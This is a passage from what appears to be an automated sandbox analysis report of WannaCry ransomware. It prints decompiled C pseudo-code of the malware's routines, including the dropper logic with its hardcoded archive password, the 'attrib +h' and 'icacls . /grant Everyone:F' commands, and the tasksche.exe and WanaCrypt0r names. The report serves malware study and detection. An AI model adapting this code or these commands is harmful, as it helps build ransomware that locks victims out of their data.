0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t77[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t76[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t75[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t74[1] & 0x000000ff) * 4) ^ ( *(0x40d054 + (( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) & 0x000000ff ^  *_t74 & 0x000000ff) * 4) ^ ( *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4) ^ _t35 >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) >> 0x00000008) & 0x000000ff ^ _t79[1] & 0x000000ff) * 4);
							_t73 =  &(_t79[2]);
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					if(_a12 != 0) {
						do {
							_t35 = _t35 >> 0x00000008 ^  *(0x40d054 + (_t35 & 0x000000ff ^  *_t73 & 0x000000ff) * 4);
							_t73 =  &(_t73[1]);
							_t32 =  &_a12;
							 *_t32 = _a12 - 1;
						} while ( *_t32 != 0);
					}
					return  !_t35;
				} else {
					return 0;
				}
			}












                0x00405422
                0x00405427
                0x00405436
                0x0040543d
                0x00405447
                0x0040544a
                0x0040544f
                0x00405465
                0x0040547f
                0x00405496
                0x004054ad
                0x004054c4
                0x004054db
                0x00405503
                0x00405505
                0x00405506
                0x00405506
                0x0040550d
                0x00405512
                0x00405514
                0x00405527
                0x00405529
                0x0040552a
                0x0040552a
                0x0040552a
                0x00405514
                0x00405534
                0x00405429
                0x0040542c
                0x0040542c

                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                • Instruction ID: 3f72058ef88e406f14a8e4c5cd972b2546dbbe82ce95f55f9558457d0f17cbf0
                • Opcode Fuzzy Hash: f53bbad7aeff0a1b6693495eaf2e1723a9e1ea82af51c52fb67f7a2539a612fb
                • Instruction Fuzzy Hash: 8E31A133E285B207C3249EBA5C4006AF6D2AB4A125B4A8775DE88F7355E128EC96C6D4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040170A Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 65libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E0040170A() {
				void* _t3;
				_Unknown_base(*)()* _t11;
				struct HINSTANCE__* _t13;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				if(E00401A45() == 0) {
					L11:
					return 0;
				}
				_t18 =  *0x40f878; // 0x0
				if(_t18 != 0) {
					L10:
					_t3 = 1;
					return _t3;
				}
				_t13 = LoadLibraryA("kernel32.dll");
				if(_t13 == 0) {
					goto L11;
				}
				 *0x40f878 = GetProcAddress(_t13, "CreateFileW");
				 *0x40f87c = GetProcAddress(_t13, "WriteFile");
				 *0x40f880 = GetProcAddress(_t13, "ReadFile");
				 *0x40f884 = GetProcAddress(_t13, "MoveFileW");
				 *0x40f888 = GetProcAddress(_t13, "MoveFileExW");
				 *0x40f88c = GetProcAddress(_t13, "DeleteFileW");
				_t11 = GetProcAddress(_t13, "CloseHandle");
				_t20 =  *0x40f878; // 0x0
				 *0x40f890 = _t11;
				if(_t20 == 0) {
					goto L11;
				}
				_t21 =  *0x40f87c; // 0x0
				if(_t21 == 0) {
					goto L11;
				}
				_t22 =  *0x40f880; // 0x0
				if(_t22 == 0) {
					goto L11;
				}
				_t23 =  *0x40f884; // 0x0
				if(_t23 == 0) {
					goto L11;
				}
				_t24 =  *0x40f888; // 0x0
				if(_t24 == 0) {
					goto L11;
				}
				_t25 =  *0x40f88c; // 0x0
				if(_t25 == 0 || _t11 == 0) {
					goto L11;
				} else {
					goto L10;
				}
			}













                0x00401713
                0x004017d8
                0x00000000
                0x004017d8
                0x0040171b
                0x00401721
                0x004017d3
                0x004017d5
                0x00000000
                0x004017d5
                0x00401732
                0x00401736
                0x00000000
                0x00000000
                0x00401751
                0x0040175e
                0x0040176b
                0x00401778
                0x00401785
                0x00401792
                0x00401797
                0x00401799
                0x0040179f
                0x004017a5
                0x00000000
                0x00000000
                0x004017a7
                0x004017ad
                0x00000000
                0x00000000
                0x004017af
                0x004017b5
                0x00000000
                0x00000000
                0x004017b7
                0x004017bd
                0x00000000
                0x00000000
                0x004017bf
                0x004017c5
                0x00000000
                0x00000000
                0x004017c7
                0x004017cd
                0x00000000
                0x00000000
                0x00000000
                0x00000000

                APIs
                  • Part of subcall function 00401A45: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00401711), ref: 00401A5A
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,?,00401711), ref: 00401A77
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptImportKey,?,?,?,00401711), ref: 00401A84
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDestroyKey,?,?,?,00401711), ref: 00401A91
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptEncrypt,?,?,?,00401711), ref: 00401A9E
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptDecrypt,?,?,?,00401711), ref: 00401AAB
                  • Part of subcall function 00401A45: GetProcAddress.KERNEL32(00000000,CryptGenKey,?,?,?,00401711), ref: 00401AB8
                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0040172C
                • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00401749
                • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00401756
                • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00401763
                • GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00401770
                • GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 0040177D
                • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040178A
                • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00401797
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: AddressProc$LibraryLoad
                • String ID: CloseHandle$CreateFileW$DeleteFileW$MoveFileExW$MoveFileW$ReadFile$WriteFile$kernel32.dll
                • API String ID: 2238633743-1294736154
                • Opcode ID: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                • Instruction ID: c344c10c919c95db3ecd10b94979b50738023765c799e55a58251b06a1d00095
                • Opcode Fuzzy Hash: 39239a652de09aa7f9a0fc3aed99621d6525255b515761ed1c17c464bdaba5bf
                • Instruction Fuzzy Hash: D9118E729003059ACB30BF73AE84A577AF8A644751B64483FE501B3EF0D77894499E1E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00407136 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 272COMMON
                Download Yara Rule
                C-Code - Quality: 88%
                			E00407136(intOrPtr* __ecx, void* __edx, void* _a4, char _a7, char* _a8, char _a11, signed int _a12, intOrPtr _a16) {
				long _v8;
				char _v267;
				char _v268;
				struct _FILETIME _v284;
				struct _FILETIME _v292;
				struct _FILETIME _v300;
				long _v304;
				char _v568;
				char _v828;
				intOrPtr _t78;
				intOrPtr _t89;
				intOrPtr _t91;
				intOrPtr _t96;
				intOrPtr _t97;
				char _t100;
				void* _t112;
				void* _t113;
				int _t124;
				long _t131;
				intOrPtr _t136;
				char* _t137;
				char* _t144;
				void* _t148;
				char* _t150;
				void* _t154;
				signed int _t155;
				long _t156;
				void* _t157;
				char* _t158;
				long _t159;
				intOrPtr* _t161;
				long _t162;
				void* _t163;
				void* _t164;

				_t154 = __edx;
				_t139 = __ecx;
				_t136 = _a16;
				_t161 = __ecx;
				if(_t136 == 3) {
					_t78 =  *((intOrPtr*)(__ecx + 4));
					_t155 = _a4;
					__eflags = _t155 - _t78;
					if(_t155 == _t78) {
						L14:
						_t156 = E00406880(_t139,  *_t161, _a8, _a12,  &_a7);
						__eflags = _t156;
						if(_t156 <= 0) {
							E00406A97( *_t161);
							_t14 = _t161 + 4;
							 *_t14 =  *(_t161 + 4) | 0xffffffff;
							__eflags =  *_t14;
						}
						__eflags = _a7;
						if(_a7 == 0) {
							__eflags = _t156;
							if(_t156 <= 0) {
								__eflags = _t156 - 0xffffff96;
								return ((0 | _t156 != 0xffffff96) - 0x00000001 & 0xfb001000) + 0x5000000;
							}
							return 0x600;
						} else {
							L17:
							return 0;
						}
					}
					__eflags = _t78 - 0xffffffff;
					if(_t78 != 0xffffffff) {
						E00406A97( *__ecx);
						_pop(_t139);
					}
					_t89 =  *_t161;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t155 -  *((intOrPtr*)(_t89 + 4));
					if(_t155 >=  *((intOrPtr*)(_t89 + 4))) {
						L3:
						return 0x10000;
					} else {
						__eflags = _t155 -  *((intOrPtr*)(_t89 + 0x10));
						if(_t155 >=  *((intOrPtr*)(_t89 + 0x10))) {
							L11:
							_t91 =  *_t161;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t155;
							if( *((intOrPtr*)(_t91 + 0x10)) >= _t155) {
								E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
								 *(_t161 + 4) = _t155;
								_pop(_t139);
								goto L14;
							}
							E00406520(_t91);
							L10:
							goto L11;
						}
						E004064E2(_t139, _t89);
						goto L10;
					}
				}
				if(_t136 == 2 || _t136 == 1) {
					__eflags =  *(_t161 + 4) - 0xffffffff;
					if( *(_t161 + 4) != 0xffffffff) {
						E00406A97( *_t161);
						_pop(_t139);
					}
					_t96 =  *_t161;
					_t157 = _a4;
					 *(_t161 + 4) =  *(_t161 + 4) | 0xffffffff;
					__eflags = _t157 -  *((intOrPtr*)(_t96 + 4));
					if(_t157 >=  *((intOrPtr*)(_t96 + 4))) {
						goto L3;
					} else {
						__eflags = _t157 -  *((intOrPtr*)(_t96 + 0x10));
						if(_t157 >=  *((intOrPtr*)(_t96 + 0x10))) {
							L27:
							_t97 =  *_t161;
							__eflags =  *((intOrPtr*)(_t97 + 0x10)) - _t157;
							if( *((intOrPtr*)(_t97 + 0x10)) >= _t157) {
								E00406C40(_t161, _t154, _t157,  &_v568);
								__eflags = _v304 & 0x00000010;
								if((_v304 & 0x00000010) == 0) {
									__eflags = _t136 - 1;
									if(_t136 != 1) {
										_t158 = _a8;
										_t137 = _t158;
										_t144 = _t158;
										_t100 =  *_t158;
										while(1) {
											__eflags = _t100;
											if(_t100 == 0) {
												break;
											}
											__eflags = _t100 - 0x2f;
											if(_t100 == 0x2f) {
												L44:
												_t137 =  &(_t144[1]);
												L45:
												_t100 = _t144[1];
												_t144 =  &(_t144[1]);
												continue;
											}
											__eflags = _t100 - 0x5c;
											if(_t100 != 0x5c) {
												goto L45;
											}
											goto L44;
										}
										strcpy( &_v268, _t158);
										__eflags = _t137 - _t158;
										if(_t137 != _t158) {
											 *(_t163 + _t137 - _t158 - 0x108) =  *(_t163 + _t137 - _t158 - 0x108) & 0x00000000;
											__eflags = _v268 - 0x2f;
											if(_v268 == 0x2f) {
												L56:
												wsprintfA( &_v828, "%s%s",  &_v268, _t137);
												E00407070(0,  &_v268);
												_t164 = _t164 + 0x18;
												L49:
												__eflags = 0;
												_t112 = CreateFileA( &_v828, 0x40000000, 0, 0, 2, _v304, 0);
												L50:
												__eflags = _t112 - 0xffffffff;
												_a4 = _t112;
												if(_t112 != 0xffffffff) {
													_t113 = E0040671D(_t154,  *_t161,  *((intOrPtr*)(_t161 + 0x138)));
													__eflags =  *(_t161 + 0x13c);
													_pop(_t148);
													if( *(_t161 + 0x13c) == 0) {
														L00407700();
														_t148 = 0x4000;
														 *(_t161 + 0x13c) = _t113;
													}
													_t60 =  &_a12;
													 *_t60 = _a12 & 0x00000000;
													__eflags =  *_t60;
													while(1) {
														_t159 = E00406880(_t148,  *_t161,  *(_t161 + 0x13c), 0x4000,  &_a11);
														_t164 = _t164 + 0x10;
														__eflags = _t159 - 0xffffff96;
														if(_t159 == 0xffffff96) {
															break;
														}
														__eflags = _t159;
														if(__eflags < 0) {
															L68:
															_a12 = 0x5000000;
															L71:
															__eflags = _a16 - 1;
															if(_a16 != 1) {
																CloseHandle(_a4);
															}
															E00406A97( *_t161);
															return _a12;
														}
														if(__eflags <= 0) {
															L64:
															__eflags = _a11;
															if(_a11 != 0) {
																SetFileTime(_a4,  &_v292,  &_v300,  &_v284);
																goto L71;
															}
															__eflags = _t159;
															if(_t159 == 0) {
																goto L68;
															}
															continue;
														}
														_t124 = WriteFile(_a4,  *(_t161 + 0x13c), _t159,  &_v8, 0);
														__eflags = _t124;
														if(_t124 == 0) {
															_a12 = 0x400;
															goto L71;
														}
														goto L64;
													}
													_a12 = 0x1000;
													goto L71;
												}
												return 0x200;
											}
											__eflags = _v268 - 0x5c;
											if(_v268 == 0x5c) {
												goto L56;
											}
											__eflags = _v268;
											if(_v268 == 0) {
												L48:
												_t160 = _t161 + 0x140;
												wsprintfA( &_v828, "%s%s%s", _t161 + 0x140,  &_v268, _t137);
												E00407070(_t160,  &_v268);
												_t164 = _t164 + 0x1c;
												goto L49;
											}
											__eflags = _v267 - 0x3a;
											if(_v267 != 0x3a) {
												goto L48;
											}
											goto L56;
										}
										_t37 =  &_v268;
										 *_t37 = _v268 & 0x00000000;
										__eflags =  *_t37;
										goto L48;
									}
									_t112 = _a8;
									goto L50;
								}
								__eflags = _t136 - 1;
								if(_t136 == 1) {
									goto L17;
								}
								_t150 = _a8;
								_t131 =  *_t150;
								__eflags = _t131 - 0x2f;
								if(_t131 == 0x2f) {
									L35:
									_push(_t150);
									_push(0);
									L37:
									E00407070();
									goto L17;
								}
								__eflags = _t131 - 0x5c;
								if(_t131 == 0x5c) {
									goto L35;
								}
								__eflags = _t131;
								if(_t131 == 0) {
									L36:
									_t162 = _t161 + 0x140;
									__eflags = _t162;
									_push(_t150);
									_push(_t162);
									goto L37;
								}
								__eflags = _t150[1] - 0x3a;
								if(_t150[1] != 0x3a) {
									goto L36;
								}
								goto L35;
							}
							E00406520(_t97);
							L26:
							goto L27;
						}
						E004064E2(_t139, _t96);
						goto L26;
					}
				} else {
					goto L3;
				}
			}





































                0x00407136
                0x00407136
                0x00407140
                0x00407148
                0x0040714a
                0x00407168
                0x0040716b
                0x0040716e
                0x00407170
                0x004071b7
                0x004071c8
                0x004071cd
                0x004071cf
                0x004071d3
                0x004071d8
                0x004071d8
                0x004071d8
                0x004071dc
                0x004071dd
                0x004071e1
                0x004071ea
                0x004071ec
                0x004071fa
                0x00000000
                0x00407206
                0x00000000
                0x004071e3
                0x004071e3
                0x00000000
                0x004071e3
                0x004071e1
                0x00407172
                0x00407175
                0x00407179
                0x0040717e
                0x0040717e
                0x0040717f
                0x00407181
                0x00407185
                0x00407188
                0x0040715e
                0x00000000
                0x0040718a
                0x0040718a
                0x0040718d
                0x00407196
                0x00407196
                0x00407198
                0x0040719b
                0x004071ad
                0x004071b3
                0x004071b6
                0x00000000
                0x004071b6
                0x0040719e
                0x00407195
                0x00000000
                0x00407195
                0x00407190
                0x00000000
                0x00407190
                0x00407188
                0x0040714f
                0x00407210
                0x00407214
                0x00407218
                0x0040721d
                0x0040721d
                0x0040721e
                0x00407220
                0x00407223
                0x00407227
                0x0040722a
                0x00000000
                0x00407230
                0x00407230
                0x00407233
                0x0040723c
                0x0040723c
                0x0040723e
                0x00407241
                0x00407255
                0x0040725a
                0x00407261
                0x0040729c
                0x0040729f
                0x004072a9
                0x004072ac
                0x004072ae
                0x004072b0
                0x004072b2
                0x004072b2
                0x004072b4
                0x00000000
                0x00000000
                0x004072b6
                0x004072b8
                0x004072be
                0x004072be
                0x004072c1
                0x004072c1
                0x004072c4
                0x00000000
                0x004072c4
                0x004072ba
                0x004072bc
                0x00000000
                0x00000000
                0x00000000
                0x004072bc
                0x004072cf
                0x004072d5
                0x004072d8
                0x00407347
                0x0040734f
                0x00407356
                0x0040737b
                0x0040738f
                0x0040739e
                0x004073a3
                0x00407312
                0x00407312
                0x0040732b
                0x00407331
                0x00407331
                0x00407334
                0x00407337
                0x004073b3
                0x004073b8
                0x004073c0
                0x004073c6
                0x004073c9
                0x004073ce
                0x004073cf
                0x004073cf
                0x004073d5
                0x004073d5
                0x004073d5
                0x004073d9
                0x004073eb
                0x004073ed
                0x004073f0
                0x004073f3
                0x00000000
                0x00000000
                0x004073f5
                0x004073f7
                0x0040742a
                0x0040742a
                0x0040745a
                0x0040745a
                0x0040745e
                0x00407463
                0x00407463
                0x0040746b
                0x00000000
                0x00407473
                0x004073f9
                0x00407415
                0x00407415
                0x00407419
                0x00407454
                0x00000000
                0x00407454
                0x0040741b
                0x0040741d
                0x00000000
                0x00000000
                0x00000000
                0x0040741f
                0x0040740b
                0x00407411
                0x00407413
                0x00407433
                0x00000000
                0x00407433
                0x00000000
                0x00407413
                0x00407421
                0x00000000
                0x00407421
                0x00000000
                0x00407339
                0x00407358
                0x0040735f
                0x00000000
                0x00000000
                0x00407361
                0x00407368
                0x004072e1
                0x004072e7
                0x004072fc
                0x0040730a
                0x0040730f
                0x00000000
                0x0040730f
                0x0040736e
                0x00407375
                0x00000000
                0x00000000
                0x00000000
                0x00407375
                0x004072da
                0x004072da
                0x004072da
                0x00000000
                0x004072da
                0x004072a1
                0x00000000
                0x004072a1
                0x00407263
                0x00407266
                0x00000000
                0x00000000
                0x0040726c
                0x0040726f
                0x00407271
                0x00407273
                0x00407283
                0x00407283
                0x00407284
                0x00407290
                0x00407290
                0x00000000
                0x00407296
                0x00407275
                0x00407277
                0x00000000
                0x00000000
                0x00407279
                0x0040727b
                0x00407288
                0x00407288
                0x00407288
                0x0040728e
                0x0040728f
                0x00000000
                0x0040728f
                0x0040727d
                0x00407281
                0x00000000
                0x00000000
                0x00000000
                0x00407281
                0x00407244
                0x0040723b
                0x00000000
                0x0040723b
                0x00407236
                0x00000000
                0x00407236
                0x00000000
                0x00000000
                0x00000000

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID:
                • String ID: %s%s$%s%s%s$:$\
                • API String ID: 0-1100577047
                • Opcode ID: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                • Instruction ID: 622825bbce38b7500016b977d00db7372d85e5c8e1565b3adbba59f792ee02a2
                • Opcode Fuzzy Hash: fa5f8851d26bf09fdef4e4f1c55e900ad1a47778409aa7a1c0108d1ccba85c9d
                • Instruction Fuzzy Hash: 42A12A31C082049BDB319F14CC44BEA7BA9AB01314F2445BFF895B62D1D73DBA95CB5A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040203B Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 106stringfileCOMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E0040203B(intOrPtr* __eax, void* __edi) {
				void* _t25;
				intOrPtr* _t33;
				int _t42;
				CHAR* _t63;
				void* _t64;
				char** _t66;

				__imp____p___argv();
				if(strcmp( *( *__eax + 4), "/i") != 0 || E00401B5F(_t42) == 0) {
					L4:
					if(strrchr(_t64 - 0x20c, 0x5c) != 0) {
						 *(strrchr(_t64 - 0x20c, 0x5c)) = _t42;
					}
					SetCurrentDirectoryA(_t64 - 0x20c);
					E004010FD(1);
					 *_t66 = "WNcry@2ol7";
					_push(_t42);
					L00401DAB();
					E00401E9E();
					E00401064("attrib +h .", _t42, _t42);
					E00401064("icacls . /grant Everyone:F /T /C /Q", _t42, _t42);
					_t25 = E0040170A();
					_t74 = _t25;
					if(_t25 != 0) {
						E004012FD(_t64 - 0x6e4, _t74);
						if(E00401437(_t64 - 0x6e4, _t42, _t42, _t42) != 0) {
							 *(_t64 - 4) = _t42;
							if(E004014A6(_t64 - 0x6e4, "t.wnry", _t64 - 4) != _t42 && E004021BD(_t31,  *(_t64 - 4)) != _t42) {
								_t33 = E00402924(_t32, "TaskStart");
								_t78 = _t33 - _t42;
								if(_t33 != _t42) {
									 *_t33(_t42, _t42);
								}
							}
						}
						E0040137A(_t64 - 0x6e4, _t78);
					}
					goto L13;
				} else {
					_t63 = "tasksche.exe";
					CopyFileA(_t64 - 0x20c, _t63, _t42);
					if(GetFileAttributesA(_t63) == 0xffffffff || E00401F5D(__edi) == 0) {
						goto L4;
					} else {
						L13:
						return 0;
					}
				}
			}









                0x00402040
                0x00402054
                0x0040208e
                0x004020a3
                0x004020b1
                0x004020b3
                0x004020bb
                0x004020c3
                0x004020c8
                0x004020cf
                0x004020d0
                0x004020d5
                0x004020e1
                0x004020ed
                0x004020f5
                0x004020fa
                0x004020fc
                0x00402104
                0x00402119
                0x0040212a
                0x00402134
                0x0040214b
                0x00402151
                0x00402154
                0x00402158
                0x00402158
                0x00402154
                0x00402134
                0x00402160
                0x00402160
                0x00000000
                0x00402061
                0x00402061
                0x0040206f
                0x0040207f
                0x00000000
                0x00402165
                0x00402165
                0x0040216b
                0x0040216b
                0x0040207f

                APIs
                • __p___argv.MSVCRT(0040F538), ref: 00402040
                • strcmp.MSVCRT(?), ref: 0040204B
                • CopyFileA.KERNEL32(?,tasksche.exe), ref: 0040206F
                • GetFileAttributesA.KERNEL32(tasksche.exe), ref: 00402076
                  • Part of subcall function 00401F5D: GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 00401F97
                • strrchr.MSVCRT(?,0000005C,?,?,00000000), ref: 0040209D
                • strrchr.MSVCRT(?,0000005C), ref: 004020AE
                • SetCurrentDirectoryA.KERNEL32(?,00000000), ref: 004020BB
                  • Part of subcall function 00401B5F: MultiByteToWideChar.KERNEL32(00000000,00000000,0040F8AC,000000FF,?,00000063), ref: 00401BCA
                  • Part of subcall function 00401B5F: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00401BDD
                  • Part of subcall function 00401B5F: swprintf.MSVCRT(?,%s\ProgramData,?), ref: 00401C04
                  • Part of subcall function 00401B5F: GetFileAttributesW.KERNEL32(?), ref: 00401C10
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.314608668.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.314603997.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314615230.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314622693.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314627112.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000002.00000002.314713530.00000000004C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                Yara matches
                Similarity
                • API ID: File$AttributesDirectorystrrchr$ByteCharCopyCurrentFullMultiNamePathWideWindows__p___argvstrcmpswprintf
                • String ID: TaskStart$attrib +h .$icacls . /grant Everyone:F /T /C /Q$t.wnry$tasksche.exe
                • API String ID: 1074704982-2844324180
                • Opcode ID: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                • Instruction ID: 0f1cc1f94130967d107883c1ee7151828ebb686b55f89e1ef1b9593e139f0a32
                • Opcode Fuzzy Hash: 89895d8f6934e01f58802458fd3b58e20f5d1862df0252ba7c7124bca42d23be
                • Instruction Fuzzy Hash: 25318172500319AEDB24B7B19E89E9F376C9F10319F20057FF645F65E2DE788D488A28
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004010FD Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 100registrystringCOMMON
                Download Yara Rule
                C-Code - Quality: 58%
                			E004010FD(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				void _v196;
				long _v216;
				void _v735;
				char _v736;
				signed int _t44;
				void* _t46;
				signed int _t55;
				signed int _t56;
				char* _t72;
				void* _t77;

				_t56 = 5;
				memcpy( &_v216, L"Software\\", _t56 << 2);
				_push(0x2d);
				_v736 = _v736 & 0;
				_v8 = _v8 & 0x00000000;
				memset( &_v735, memset( &_v196, 0, 0 << 2), 0x81 << 2);
				asm("stosw");
				asm("stosb");
				wcscat( &_v216, L"WanaCrypt0r");
